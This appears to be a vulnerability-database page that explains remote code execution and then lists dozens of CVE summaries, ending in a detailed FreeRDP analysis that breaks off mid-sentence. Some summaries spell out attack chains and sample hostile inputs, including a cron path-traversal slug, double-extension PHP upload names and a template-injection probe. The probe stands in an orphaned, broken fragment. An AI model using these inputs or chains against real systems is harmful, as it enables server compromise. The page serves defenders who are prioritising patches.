Remote Code Execution
Remote Code Execution represents the critical moment when an attacker successfully runs arbitrary code on a target system without physical access.
How It Works
Remote Code Execution represents the critical moment when an attacker successfully runs arbitrary code on a target system without physical access. Unlike a single vulnerability class, RCE is an outcome—the catastrophic result of exploiting underlying weaknesses in how applications process input, manage memory, or handle executable content.
Attackers typically achieve RCE by chaining vulnerabilities or exploiting a single critical flaw. Common pathways include injecting malicious payloads through deserialization flaws (where untrusted data becomes executable objects), command injection (where user input flows into system commands), buffer overflows (overwriting memory to hijack execution flow), or unsafe file uploads (placing executable code on the server). Server-Side Template Injection and SQL injection can also escalate to code execution when attackers leverage database or template engine features.
The attack flow usually begins with reconnaissance to identify vulnerable endpoints, followed by crafting a payload that exploits the specific weakness, then executing commands to establish persistence or pivot deeper into the network. Modern exploits often use multi-stage payloads—initial lightweight code that downloads and executes more sophisticated tooling.
Impact
- Complete system compromise — attacker gains shell access with application privileges, potentially escalating to root/SYSTEM
- Data exfiltration — unrestricted access to databases, configuration files, credentials, and sensitive business data
- Lateral movement — compromised server becomes a beachhead to attack internal networks and other systems
- Ransomware deployment — direct pathway to encrypt files and disable backups
- Persistence mechanisms — installation of backdoors, web shells, and rootkits for long-term access
- Supply chain attacks — modification of application code or dependencies to compromise downstream users
Real-World Examples
The n8n workflow automation platform (CVE-2024-21858) demonstrated how RCE can emerge in unexpected places-attackers exploited unsafe workflow execution to run arbitrary code on self-hosted instances. The Log4j vulnerability (Log4Shell) showed RCE at massive scale when attackers sent specially crafted JNDI lookup strings that triggered remote class loading in Java applications worldwide.
Atlassian Confluence instances have faced multiple RCE vulnerabilities through OGNL injection flaws, where attackers inject Object-Graph Navigation Language expressions that execute with server privileges. These required no authentication, enabling attackers to compromise thousands of internet-exposed instances within hours of disclosure.
Mitigation
- Input validation and sanitization — strict allowlists for all user-controlled data, especially in execution contexts
- Sandboxing and containerization — isolate application processes with minimal privileges using containers, VMs, or security contexts
- Disable dangerous functions — remove or restrict features like code evaluation, system command execution, and dynamic deserialization
- Network segmentation — limit blast radius by isolating sensitive systems and restricting outbound connections
- Web Application Firewalls — detect and block common RCE patterns in HTTP traffic
- Runtime application self-protection (RASP) — monitor application behavior for execution anomalies
- Regular patching — prioritize updates for components with known RCE vulnerabilities
Recent CVEs (31864)
Sensitive configuration exfiltration in Grav CMS before 2.0.2 lets an authenticated page author bypass the Twig sandbox and read the full config tree, including plugin SMTP credentials, API keys, and database passwords. The flaw is an incomplete fix for the earlier GHSA-j274-39qw-32c9 sandbox escape: the redacted 'config' facade is still trivially bypassed through the allow-listed grav.offsetGet('config') call. No public exploit has been identified at time of analysis, though the bypass technique is fully described in the vendor advisory.
Remote code execution in PraisonAI before 4.6.78 lets an attacker who can supply the agents_file parameter to deploy/api.py run arbitrary Python, because that value is interpolated directly into an f-string that is later executed as generated server code via subprocess.Popen(). The CVSS 4.0 base score is 9.4 and the vector requires high privileges (PR:H), meaning the attacker must already be able to reach and drive the deployment API. No public exploit has been identified at time of analysis and it is not on the CISA KEV list.
Arbitrary Python code execution in PraisonAI (praisonaiagents) before 1.6.78 occurs when AgentFlow._resolve_pydantic_class resolves a string output_pydantic reference in a workflow step, causing the framework to import a sibling tools.py from the workflow file's directory via importlib exec_module without any sandboxing. Because this loader ignores the PRAISONAI_ALLOW_*_TOOLS environment guardrails, an attacker who supplies a malicious workflow file plus its tools.py runs code with the workflow runner's privileges the moment the workflow is executed via WorkflowManager or loaded through load_yaml. No public exploit is identified at time of analysis, and the flaw is not listed in CISA KEV.
Heap overflow in libarchive's PAX extended header parser allows exploitation via a maliciously crafted tar archive containing a malformed SUN.holesdata sparse-file attribute. Successful exploitation of the affected system could result in a denial of service condition or, in more serious cases, arbitrary code execution under the privileges of the process invoking libarchive. No public exploit code or active exploitation has been confirmed at time of analysis, though a GitHub pull request (#3253) indicating an upstream fix is available suggests the issue is reproducible and patch-ready. The official CVSS score of 3.9 (Low) conflicts materially with the vendor-applied RCE tag, a discrepancy that warrants independent validation.
Local File Inclusion in the Happyforms WordPress plugin (all versions through 1.26.12) allows authenticated administrators to include and execute arbitrary PHP files on the server via the happyforms_get_form_partial() function, enabling full remote code execution when the attacker can also upload PHP files. The vulnerability is rooted in unsanitized filename handling (CWE-98) within the form template rendering logic, as evidenced by the affected files class-wp-customize-form-manager.php and helper-form-templates.php. No public exploit code or CISA KEV listing has been identified at time of analysis, and the Administrator-level access prerequisite substantially limits the realistic attacker population.
Arbitrary code execution in Samsung's libpadm.so system library on Galaxy devices allows a local, low-privileged attacker to corrupt memory via an out-of-bounds write and run code in the context of the vulnerable component prior to the SMR Jul-2026 Release 1. The flaw was reported internally by Samsung Mobile Security and carries a CVSS 4.0 base score of 8.4 (high). No public exploit identified at time of analysis and it is not listed in CISA KEV.
Local privilege escalation to arbitrary code execution in Samsung's fabricKeymaster trustlet affects Galaxy devices running builds prior to the SMR Jul-2026 Release 1 security patch level. A local attacker who already holds privileged (root/system-level) access on the device can exploit a time-of-check-to-time-of-use race condition to run arbitrary code within the Keymaster trusted application, undermining the hardware-backed key store. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the flaw was reported directly by Samsung's own mobile security team.
Local privilege-escalating code execution in Samsung's libsavsac.so native library (used in Galaxy devices running firmware prior to the SMR Jul-2026 Release 1) allows a low-privileged local attacker to trigger an out-of-bounds write and execute arbitrary code in the context of the affected component. The flaw was reported by Samsung's own Mobile Security team and carries a CVSS 4.0 base score of 8.4 (High). No public exploit identified at time of analysis, and the CVE is not listed in CISA KEV.
Unauthenticated arbitrary file upload in the Instant Appointment WordPress plugin (all versions ≤ 1.2) lets remote attackers upload files of any type through the 'insapp_upload_image_as_attachment' function, which lacks file-type validation, potentially enabling remote code execution by planting a PHP webshell. Any WordPress site running the plugin is exploitable without authentication or user interaction, matching its 9.8 CVSS rating. No public exploit identified at time of analysis, and the flaw is not in CISA KEV.
Remote code execution in the Post Export Import with Media WordPress plugin (all versions ≤ 1.13.1) is possible because a trailing-dot filename bypass (e.g. 'shell.php.') defeats the extension allow-list in ajax_import_media_start(), letting an administrator-level user smuggle an executable PHP file into the uploads directory during a media import. Reported by Wordfence, the flaw carries CVSS 7.2 and has no public exploit identified at time of analysis; exploitation requires existing administrator (PR:H) access, making it primarily a hardening/defense-in-depth bypass rather than a mass-exploitable entry point.
Remote code execution in the Salon Booking System - Free Version WordPress plugin (all versions ≤ 10.30.32) lets a remote attacker write attacker-controlled PHP into the plugin's web-accessible translate-constants.php file by abusing the unprotected setCustomText AJAX handler. Because the handler lacks proper nonce validation (CWE-352 CSRF), an unauthenticated attacker who tricks a logged-in administrator into clicking a crafted link can achieve full server-side code execution. Reported by Wordfence with a CVSS of 8.8; there is no public exploit identified at time of analysis and it is not on CISA KEV.
Unauthenticated remote code execution in the Super Forms - Drag & Drop Form Builder WordPress plugin (all versions through 6.3.313) allows attackers to upload executable files via the nopriv submit_form AJAX handler, which lacks both file-type validation (CWE-434) and any capability check. The plugin's only guardrail is a session nonce, but the companion super_create_nonce nopriv action lets any visitor mint a valid sf_nonce and session cookie on demand, collapsing the attack to two unauthenticated HTTP requests. No public exploit identified at time of analysis, but the CVSS 9.8 rating and trivial exploitability make this a high-priority patch item.
Boundary validation failure in GoBGP's BGP OPEN capability parser allows a remote peer to send a malformed OPEN message that causes concrete capability decoders to read beyond the declared CapLen field, enabling attacker-controlled bytes to be interpreted as capability values - most critically, as a 4-octet AS number that influences peer AS validation and BGP session establishment decisions. Affected is GoBGP v4 (pkg:go/github.com_osrg_gobgp_v4), with the 4-octet AS capability (code 65) identified as the highest-impact case. A parser-level proof-of-concept is publicly described in GitHub Security Advisory GHSA-gjrg-jjr3-56cm; no active exploitation has been confirmed and this CVE does not appear in the CISA KEV catalog. IMPORTANT METADATA CONFLICT: The provided intelligence tags label this as 'RCE, Buffer Overflow, Information Disclosure' - all three directly contradict the CVE description, which explicitly states the issue is not arbitrary memory corruption, remote code execution, or information disclosure; security teams must disregard those tags.
Path traversal in psd-tools through v1.17.0 exposes any application processing untrusted PSD files to arbitrary file write and secondary arbitrary file read via the SmartObject API. SmartObject.save() consumes the embedded smart-object filename verbatim from the PSD binary - without basename stripping, absolute-path rejection, or directory-escape filtering - allowing a crafted PSD to write attacker-supplied bytes to any path the process can reach. A secondary issue in SmartObject.open() for external-kind objects uses the attacker-controlled fullPath descriptor as a read source, enabling file exfiltration to the write destination. A standalone proof-of-concept is publicly confirmed in the advisory; the fix is vendor-confirmed in v1.17.1 (PR #657). No public exploit identified at time of analysis beyond the advisory-embedded POC, and no CISA KEV listing was found.
Arbitrary OS command execution in Vim prior to 9.2.0736 arises from the bundled PHP omni-completion script (runtime/autoload/phpcomplete.vim), which interpolates an attacker-controlled class or trait name from the edited buffer into a search() pattern executed via win_execute() without escaping. When a victim opens a crafted PHP file and invokes omni-completion, a name containing a single quote breaks out of the search string and the trailing text is honored as Ex commands, letting an attacker run shell commands through :! . There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the flaw is fixed and the mechanism is well documented in the vendor advisory.
Arbitrary Ex command execution in Vim before 9.2.0735 arises from its C omni-completion script (runtime/autoload/ccomplete.vim), which interpolates the unescaped typeref: or typename: field of a tags entry into a :vimgrep pattern passed to :execute. Because :vimgrep treats the bar character as a command separator, a crafted tag field can terminate the search pattern and append an attacker-controlled command that runs with the privileges of the editing user when a victim opens a malicious .c file and triggers C omni-completion. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the CVSS 4.0 base score of 8.4 reflects high confidentiality, integrity, and availability impact.
Arbitrary file disclosure in docuForm GmbH Client v11.11c allows a remote, low-privileged attacker to read sensitive server files through the dfm-menu_report.php component by supplying attacker-controlled path input. The NVD description asserts arbitrary code execution and the vendor gist tags it 'RCE'/'Authentication Bypass', but the concrete described capability is reading configuration files, source code, and system files, with code execution unsubstantiated in the available data. No public exploit is confirmed via a flag, though a third-party gist reference (ZeroBreach-GmbH) is published and likely carries proof-of-concept detail; EPSS is low at 0.35% (27th percentile) and the CVE is not on CISA KEV.
Authenticated remote code execution in docuForm GmbH Client v11.11c lets low-privileged users abuse the report.php file-upload component to run arbitrary code on the server. The flaw combines an authorization-bypass weakness (CWE-639) with unrestricted file upload, so an attacker with any valid account can escalate to full server compromise. No public exploit identified at time of analysis, though a third-party gist referenced in NVD may contain technical write-up material; EPSS is low (0.24%, 15th percentile) and the CVE is not in CISA KEV.
Broken object-level authorization in docuForm GmbH Client v11.11c lets an authenticated remote user manipulate the user settings component to read and modify other users' account data, with the reporter additionally claiming this can escalate to arbitrary code execution. The flaw stems from user-controlled object references (CWE-639) that the application fails to authorize against the requesting session. There is no public exploit identified at time of analysis and the vulnerability is not listed in CISA KEV; EPSS is low at 0.27% (18th percentile).
Unauthenticated remote code execution in Hermes WebUI before version 0.51.788 lets remote attackers run arbitrary shell commands by reaching the product's embedded terminal API without any credentials. Because of a missing authentication check (CWE-306), an attacker chains four sequential unauthenticated HTTP requests to create a session, attach a PTY shell, and inject commands, executing code as the server process user. Reported by VulnCheck with a CVSS 4.0 base score of 9.3; a vendor patch is available and no public exploit code has been identified at time of analysis.
PHP object injection in YesWiki's BazaR import feature allows an attacker to reach an unsafe unserialize() sink in tools/bazar/services/CSVManager.php, where attacker-supplied base64 data is deserialized without allowed_classes=false, instantiating arbitrary classes and triggering magic methods (__destruct, and __toString via array_map('strval')). Because the importentries mode lacks CSRF protection (the assigned root cause CWE-352), a remote attacker can host an auto-POSTing HTML page that, when visited by a logged-in wiki admin, drives the deserialization using the admin's session - chaining published Doctrine PHPGGC gadgets into remote code execution on the host. Publicly available exploit code exists demonstrating the object-injection primitive, but no full end-to-end RCE chain is published and this is not confirmed actively exploited (not in CISA KEV).
Reflected XSS in YesWiki doryphore 4.6.5 allows an attacker to execute arbitrary JavaScript in a victim's browser by exploiting unescaped output of the `time` GET parameter in the archived-revision edit form at `handlers/page/show.php`. A working proof-of-concept has been published by the reporter and confirmed against the official package; the attack exploits MySQL's DATETIME coercion to accept a malformed timestamp that begins with a real archived revision value yet appends injected markup, causing the archived-revision branch to render and reflect the payload unescaped. No active exploitation has been confirmed by CISA KEV, but the detailed PoC lowers the barrier to weaponization.
{{ 7 * 7 }} rendering as 49, escalated to an interactive reverse shell); this vulnerability is not in CISA KEV and there is no evidence of active exploitation.
Authenticated remote code execution in LibreBooking (open-source scheduling/reservation platform) versions prior to 5.1.0 allows an administrator to write arbitrary files outside the intended template directory by abusing the email template editor's save action, which trusts the submitted template name as part of the destination file path. Because the resulting file can be dropped into a web-executable location, the write primitive escalates to server-side code execution. No public exploit has been identified at time of analysis and the flaw is not listed in CISA KEV, but a CISA CSAF advisory and upstream fix commit exist.
Remote code execution in Metabase (open-source BI/analytics platform) versions 1.55.0 through the fixed releases arises because one database-creation code path failed to validate unsafe H2 JDBC connection properties, letting an authenticated administrator register a crafted H2 datasource and run arbitrary Java on the server host. Because the CVSS scope is Changed (S:C), successful exploitation escapes the application context and yields full host compromise. No public exploit has been identified at time of analysis and it is not listed in CISA KEV, but the CVSS base score of 9.1 and RCE nature make it a high-priority patch for any exposed Metabase instance.
Arbitrary code execution on the host operating system is achievable by an authenticated FileMaker Server administrator via a malicious file upload through the Open Source LLM setup feature - specifically the Miniforge installer upload path - in the Admin Console. All FileMaker Server versions prior to 26.0.1 are affected; the flaw is classified as CWE-434 (unrestricted upload of a dangerous file type) and was reported directly by Apple/Claris product security. No public exploit code or CISA KEV listing exists at time of analysis, and SSVC rates exploitation as none with no automation feasibility, substantially limiting real-world risk despite the RCE classification.
Prototype pollution in apidevtools json-schema-ref-parser up to v15.3.5 allows low-privileged remote attackers to modify Object prototype attributes via crafted input to the Refs.set/Pointer.set functions in lib/pointer.ts. The vulnerability is tagged RCE and Code Injection, reflecting the theoretical worst-case of prototype pollution in Node.js environments where polluted properties propagate to dangerous sinks; however, the CVSS 4.0 score of 2.1 with limited (L/L/L) impact ratings suggests the direct, exploitable impact is constrained. A proof-of-concept exists (CVSS 4.0 E:P) but no confirmed active exploitation has been recorded in CISA KEV.
Cross-user remote code execution in Open WebUI before 0.10.0 lets an authenticated user run arbitrary code interpreter Python or invoke tools inside another logged-in user's session. The get_event_call handler dispatched execute:python and execute:tool Socket.IO events to any client-supplied session_id that was merely 'connected', so an attacker who harvested a victim's socket ID via the ydoc:document:join collaboration flow could hijack that session. A proof-of-concept is indicated in the SSVC data, though the flaw is not in CISA KEV and EPSS rates near-term mass exploitation low (0.28%, 19th percentile).
Malicious firmware installation is possible on Siemens CPCI85 Central Processing/Communication firmware (versions before V26.20) and the SICORE Base System (before V26.20.0) because the firmware update mechanism fails to properly validate signatures. An attacker with high privileges and local access can push crafted, tampered firmware to achieve persistent code execution and full device compromise. There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV.
Root-privileged arbitrary directory creation and file write affects Note Mark (self-hosted notes application) versions <= v0.19.4, arising because book and note slug validation uses the unanchored huma OpenAPI pattern '[a-z0-9-]+', letting a low-privilege authenticated user store a path-traversal slug such as '../../../../etc/cron.d/x'. When an administrator later runs the 'note-mark migrate export' or 'export-v1' CLI (routinely as root in Docker), the exporter joins the raw slug into the output path and writes '_index.md' outside the export directory, enabling escalation to code execution as root. Publicly available exploit code exists (a version-pinned Go reproducer plus an end-to-end Docker walkthrough); this is the unpatched sibling of GHSA-g49p-4qxj-88v3 and is not listed in CISA KEV.
Authentication bypass leading to remote code execution in Xerte Online Tools (all versions below 3.14.6 and below 3.15.5) lets unauthenticated remote attackers reach the exposed /setup/ installer and re-run the installation, pointing the application at a database they control and thereby seizing full control of the toolkit. The flaw scores CVSS 9.1 (AV:N/AC:L/PR:N/UI:N) and is tagged Authentication Bypass and RCE; a vendor patch exists but there is no public exploit identified at time of analysis. CISA's SSVC framework rates it not-exploited but automatable with partial technical impact.
Privilege escalation in the Qt Axivion Dashboard allows an authenticated low-privileged user to mint API tokens for other, higher-privileged accounts via the undocumented POST /api/users/~/{user}/tokens endpoint, which failed to enforce an authorization check on the target user. An attacker who knows a more-privileged user's login name and can log in through the Dashboard's OAuth/OIDC flow can forge and finalize a token for that account, potentially seizing Dashboard Administrator rights and — chained with a separate weakness — achieving code execution on the host. CVSS 4.0 is rated 8.7 (High); there is no public exploit identified at time of analysis and the CVE is not listed in CISA KEV.
Arbitrary file deletion in the Bit Form WordPress plugin (all versions through 3.1.1) lets low-privileged authenticated users delete any file on the server via an unsanitized path passed to the deleteFiles function. Because a subscriber-level attacker can remove critical files such as wp-config.php, this path traversal escalates into a full site takeover / remote code execution scenario. Reported by Wordfence with a CVSS of 7.1; no public exploit identified at time of analysis and it is not listed in CISA KEV.
Arbitrary file upload leading to remote code execution affects the premium Blocksy Companion Pro plugin for WordPress in all versions through 2.1.46, where the Custom Fonts extension's flawed MIME validation lets unauthenticated attackers upload executable PHP files disguised as fonts. The Custom Fonts extension registers a wp_check_filetype_and_ext filter that uses strpos() to approve any filename merely containing '.woff2' or '.ttf' anywhere in the string, so a double-extension payload like shell.woff2.php passes as a legitimate font. Reported by Wordfence with a CVSS of 9.8; no public exploit identified at time of analysis and it is not listed in CISA KEV.
Remote code execution in the Popup Maker WordPress plugin (all versions through 1.22.0) allows authenticated attackers holding editor-level access or above to install and activate an arbitrary plugin from an attacker-controlled URL, resulting in full server-side code execution. The root cause is a missing authorization check (CWE-862) in the plugin's REST API Connect controller, whose install endpoint treats a bearer token - issued by the legacy v1/connect/info endpoint - as its only non-spoofable authorization gate. Reported by Wordfence; no public exploit identified at time of analysis, and the issue is not listed in CISA KEV.
Local File Inclusion in the WPFunnels WordPress plugin (all versions through 3.12.7) allows authenticated administrators to include and execute arbitrary PHP files on the server via the unsanitized `logKey` parameter, yielding full remote code execution when combined with file upload capability. The attack requires administrator-level WordPress credentials and high complexity - specifically the ability to place a PHP file on the server - materially limiting the exploitable population. No public exploit code or CISA KEV listing has been identified at time of analysis, placing this in a routine-patching priority tier despite its severe potential impact.
Man-in-the-middle credential theft and root code execution affects the BOSH CLI (bosh-cli) prior to v7.10.4, which fails to verify the DAV blobstore server certificate during 'bosh create-env' and 'bosh delete-env' even though a valid CA certificate is present in the installation manifest. An adjacent network attacker who can intercept the operator's HTTPS upload can harvest Basic-auth credentials and the rendered-templates archive holding every bootstrap secret for the new BOSH Director, then replay those credentials against the target VM's agent to gain root code execution. There is no public exploit identified at time of analysis, but the vendor-rated CVSS 4.0 score of 8.9 reflects the high impact of a full Director compromise.
Remote code execution in Google Chrome desktop before 150.0.7871.115 stems from a use-after-free in the InterestGroups component (the Protected Audience / FLEDGE ad-auction API of Privacy Sandbox), letting a remote attacker run arbitrary code within the renderer sandbox by luring a victim to a crafted HTML page. Google rates the Chromium severity High, and the CVSS 8.8 reflects network-reachable, low-complexity, unauthenticated exploitation gated only by user interaction (visiting a page). There is no public exploit identified at time of analysis and the flaw is not listed in CISA KEV, though EPSS-style risk for Chrome memory-corruption bugs is typically elevated once details circulate.
Uninitialized Use in V8 in Google Chrome prior to 150.0.7871.115 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Sandboxed remote code execution in Google Chrome versions prior to 150.0.7871.115 stems from a use-after-free in the Forms component, allowing a remote attacker to run arbitrary code within the renderer sandbox when a victim opens a crafted HTML page. The flaw carries a High Chromium severity rating and CVSS 8.8; Google has shipped a stable-channel fix, but no public exploit has been identified at time of analysis. Because code execution is confined to the sandbox, a separate sandbox-escape bug would be required for full host compromise.
Sandboxed remote code execution in Google Chrome desktop before 150.0.7871.115 lets a remote attacker run arbitrary code within the renderer sandbox when a victim opens a crafted HTML page, stemming from an inappropriate implementation in the Forms component (Chromium severity: High). No public exploit identified at time of analysis, and the flaw is not on CISA KEV; Google has shipped a fixed Stable channel build. The high CVSS (8.8) reflects full compromise of the affected renderer process, though code execution is stated to be confined to the sandbox rather than a full host takeover.
Use after free in WebRTC in Google Chrome prior to 150.0.7871.115 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Remote code execution in Google Chrome desktop before 150.0.7871.115 stems from a use-after-free in the browser's Input component, letting a remote attacker who lures a victim to a crafted HTML page run arbitrary code inside the renderer sandbox. Google rates the Chromium severity High and CVSS is 8.8, requiring user interaction (visiting a malicious page) but no authentication. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the memory-corruption class and network attack vector make it a standard high-priority browser patch.
Remote code execution in Google Chrome desktop before 150.0.7871.115 lets a remote attacker run arbitrary code (constrained to the renderer sandbox) by luring a victim to a crafted HTML page that triggers a use-after-free in the Actor component. The flaw is network-reachable and requires only that the user visit a malicious page, but Chromium rates the severity High rather than Critical because code execution stays inside the renderer sandbox. No public exploit identified at time of analysis; no EPSS or KEV signal was supplied in the input.
Renderer-process code execution in Google Chrome desktop before 150.0.7871.115 arises from a use-after-free in the IndexedDB implementation, letting a remote attacker run arbitrary code within the Chromium sandbox when a victim opens a crafted HTML page. Chromium rated the flaw Medium severity even though the CVSS base score is 8.8, reflecting that execution is confined to the sandboxed renderer rather than the host. A vendor patch is available and no public exploit has been identified at time of analysis.
Remote code execution in the Generic OEM UZ801_v2.1 4G LTE Router (firmware V3.4.3) lets unauthenticated attackers run arbitrary code by sending crafted requests to the /ajax web management API served by the device's MifiService.apk component. The flaw stems from broken access control on the management endpoint, giving remote attackers full control of the device with no credentials. Publicly available exploit code exists on GitHub, though EPSS probability is low (0.24%, 15th percentile) and it is not on the CISA KEV list.
Sandbox escape in the OpenJDK packages shipped by Ubuntu allows a compromised sandboxed application to break out and run arbitrary code on the host. Because the packages' .jar MIME handlers execute any file flagged executable (when the mailcap package is present), an app abusing the OpenURI portal through xdg-desktop-portal-gtk can drop a malicious .jar, set its executable bit, and invoke the handler. There is no public exploit identified at time of analysis, but the flaw carries a CVSS 8.8 with a changed scope, reflecting full loss of host confidentiality, integrity and availability once the sandbox boundary is crossed.
Elasticsearch Painless script injection via OpenCTI's GraphQL API allows any authenticated user holding the KNOWLEDGE capability to submit computationally expensive, unvalidated scripts that saturate Elasticsearch cluster CPU, degrading or denying service for the entire platform. All OpenCTI deployments prior to version 7.260401.0 are affected, with the vulnerability residing in the exposed 'script' FilterOperator of the GraphQL API. No public exploit code or CISA KEV listing is confirmed at time of analysis; a vendor-released patch is available in version 7.260401.0.
Memory corruption in the User-ID Terminal Server Agent (TSA) of Palo Alto Networks PAN-OS lets an unauthenticated network attacker crash the service (DoS) or potentially execute arbitrary code by sending crafted traffic to the TSA listener. Multiple out-of-bounds write bugs are involved; the vendor's CVSS 4.0 vector flags the exploit as unproven (E:U), and no public exploit has been identified at time of analysis. Panorama is explicitly not affected, and exposure hinges on whether the optional TSA component is deployed and reachable.
Unauthenticated remote code execution in Joro ≤ v1.1.0 (BishopFox's offensive-security tooling) allows an attacker to gain a shell as the operator's user when that operator merely visits a malicious web page. In the default proxy mode, Joro exposes an unauthenticated local API on 127.0.0.1:9090 with a wildcard CORS policy; because plugin uploads use the CORS-safelisted multipart/form-data content type, cross-origin JavaScript can upload a native Go plugin and trigger a restart through the operator's browser with no preflight or credentials, and the plugin's init() executes on load. No public exploit is identified at time of analysis, but the advisory documents a complete, reproducible attack chain, and the assigned CVSS is 9.6 (Critical).
Remote code execution in DSpace 8.0-8.3 and 9.0-9.2 allows an authenticated administrator to execute arbitrary Java via Velocity templates used to render COAR Notify/LDN messages, using reflection to escape the templating sandbox. Exploitation requires valid DSpace administrator credentials and is most impactful when chained with the related LDN path-traversal flaw (GHSA-9qm4-rh6w-pq5x). No public exploit identified at time of analysis, and CVSS is 8.0 (High).
OS command injection in Nuclio (serverless platform) versions <= 1.15.27 lets attackers run arbitrary shell commands as root inside Kubernetes CronJob pods by submitting a function with a crafted cron trigger. The controller concatenates unsanitized `event.headers` keys and `event.body` values into a `/bin/sh -c` curl string; a header key containing a double-quote breaks quoting, and a body containing `$()` triggers command substitution (strconv.Quote does not escape it). Because the Nuclio Dashboard API is unauthenticated in its default configuration, this is remotely reachable; no public exploit is identified in KEV, though a detailed, dynamically-verified PoC accompanies the advisory.
Custom Code Guardrails in LiteLLM's AI Gateway proxy prior to 1.82.0-stable permitted privileged users with guardrail management rights to submit arbitrary Python code via the production create and update API paths, which executed unsandboxed within the proxy process. Unlike the test endpoint - which enforced sandbox controls - the production paths lacked equivalent validation, enabling the injected code to access and expose secrets, API keys, and environment variables available to the running process. No public exploit or active exploitation (CISA KEV) has been identified at time of analysis; risk is highest in multi-tenant or multi-operator LiteLLM deployments where guardrail management rights are distributed.
Unrestricted file upload in Grav API Plugin 1.0.0 allows authenticated users to store arbitrary content - including PHP scripts, SVG with embedded JavaScript, and polyglot payloads - via the avatar upload endpoint by supplying a forged client-declared MIME type beginning with 'image/'. The endpoint performs no server-side content inspection and imposes no extension restriction, so malicious files are written to user/accounts/avatars/ with predictable filenames. Immediate exploitation is partially mitigated by an .htaccess rule that returns HTTP 403 on direct access, but the files persist on disk and represent a latent RCE or stored XSS vector if a co-resident path traversal flaw or server misconfiguration bypasses that control. No public exploit code or CISA KEV listing has been identified at time of analysis.
## Summary Remote code execution and denial of service in FreeRDP before 3.22.0 stem from a use-after-free in the dynamic virtual channel manager (drdynvc), where `dvcman_channel_close` and `dvcman_call_on_receive` access `channel_callback` without proper synchronization (CWE-362). A malicious or compromised RDP server can race DYNVC_DATA and DYNVC_CLOSE messages to free a channel callback while another thread still uses it, corrupting the client heap. This is a client-side flaw affecting anyone connecting to an attacker-controlled server; no public exploit identified at time of analysis, and it is not listed in CISA KEV. ## Technical Context FreeRDP is a widely used open-source implementation of the Microsoft Remote Desktop Protocol, embedded in clients such as Remmina, GNOME Connections, Weston, and numerous commercial and VDI products. The bug lives in the drdynvc (Dynamic Virtual Channel) subsystem, which multiplexes optional channels (clipboard, audio, device redirection, etc.) over the RDP connection and processes them on a dedicated client thread. Per CWE-362 (concurrent execution using shared resource with improper synchronization / race condition), `dvcman_channel_close` (handling DYNVC_CLOSE) can free the `channel_callback` structure while `dvcman_call_on_receive` (handling DYNVC_DATA) is concurrently dereferencing it, producing a heap use-after-free. Because the RDP server dictates the timing and ordering of DYNVC_DATA and DYNVC_CLOSE PDUs, a hostile server controls the race window. ## Risk Assessment The published CVSS 4.0 vector (AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H) yields 8.3 (High), driven mainly by high availability impact with lower confidentiality/integrity impact — consistent with a heap corruption that reliably crashes the client (DoS) but only potentially yields RCE. AC:H correctly reflects that success depends on winning a non-deterministic thread race, which is unreliable and may require many attempts. There is no EPSS score, no KEV listing, and no confirmed public POC in the provided data, so exploitation pressure is currently low-to-unknown; the RCE and Denial Of Service tags reflect potential impact, not observed attacks. One nuance to verify: the vector uses UI:N/PR:N, but this is a client-side vulnerability requiring the victim to connect to a malicious server — a real-world limiting factor that raw CVSS understates. Net: a legitimate patch priority for fleets whose users connect to untrusted or reachable RDP endpoints, but not an emergency mass-exploitation scenario given AC:H and no evidence of exploitation. ## Affected Products FreeRDP (the open-source RDP client/library and its FreeRDP-based clients) at all versions prior to 3.22.0 are affected; the flaw is fixed in FreeRDP 3.22.0. No CPE strings were provided in the input, so exact downstream package ranges (e.g., distribution builds of Remmina or the freerdp2/freerdp3 packages) should be confirmed against vendor trackers. Authoritative details are in the FreeRDP GitHub Security Advisory GHSA-3mv2-5q57-2v8h (https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-3mv2-5q57-2v8h) and the VulnCheck advisory (https://www.vulncheck.com/advisories/freerdp-use-after-free-via-race-condition-in-drdynvc-channel-callback). ## Remediation Vendor-released patch: FreeRDP 3.22.0 — upgrade all FreeRDP libraries and any FreeRDP-based clients (Remmina, GNOME Connections, xrdp clients, etc.) to 3.22.0 or later, rebuilding or updating downstream distribution packages that bundle the library. Until patched, reduce exposure by only connecting to trusted, known-good RDP servers and avoiding connections to untrusted or attacker-influenced hosts, since the malicious behavior originates server-side; where feasible, restrict outbound RDP (TCP 3389) from client machines to an allowlist of approved servers via egress firewall rules (trade-off: breaks ad-hoc connections to new servers). If specific dynamic virtual channels are not required, disabling optional channel redirections (clipboard, drive, audio) narrows the attack surface of drdynvc but does not fully eliminate the race and reduces functionality. Follow guidance in GHSA-3mv2-5q57-2v8h (https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-3mv2-5q57-2v8h) and the VulnCheck advisory (https://www.vulncheck.com/advisories/freerdp-use-after-free-via-race-condition-in-drdynvc-channel-callback). ## Exploit Scenario An attacker stands up or compromises an RDP server and lures a victim into connecting with a vulnerable FreeRDP client (e.g., via a malicious .rdp file, phishing link, or a man-in-the-middle position). Once connected, the server rapidly interleaves DYNVC_DATA and DYNVC_CLOSE messages on a dynamic virtual channel to win the race and trigger the heap use-after-free in the client's drdynvc thread, crashing the client or, with careful heap grooming, potentially executing code in the client process. No public POC is identified at this time, and the AC:H race condition makes reliable code execution difficult. ## Exploitation Conditions Exploitation requires the victim to establish an RDP session to an attacker-controlled or compromised server running against a FreeRDP client before 3.22.0, and the connection must use the drdynvc dynamic virtual channel path. The attacker must then concurrently send DYNVC_DATA and DYNVC_CLOSE messages on a dynamic virtual channel to win a timing race in `channel_callback` access. Limiting factors: the attacker must control the RDP server side (this is a client-side vulnerability, so it cannot be triggered against an unwilling client that never connects), the exploit depends on winning a non-deterministic thread race (CVSS AC:H) so it is unreliable and may require repeated attempts, and reliable code execution beyond a crash requires heap-layout control. No authentication to the malicious server is needed, but the user must initiate the outbound connection. ## Attack Chain Lure victim to malicious RDP server → Client opens dynamic virtual channel (drdynvc) → Server races DYNVC_DATA and DYNVC_CLOSE → Trigger heap use-after-free on channel_callback → Crash client or execute code in client process ## Confidence Notes Affected/fixed version (before 3.22.0; fixed in 3.22.0), root cause, and functions are confirmed by the 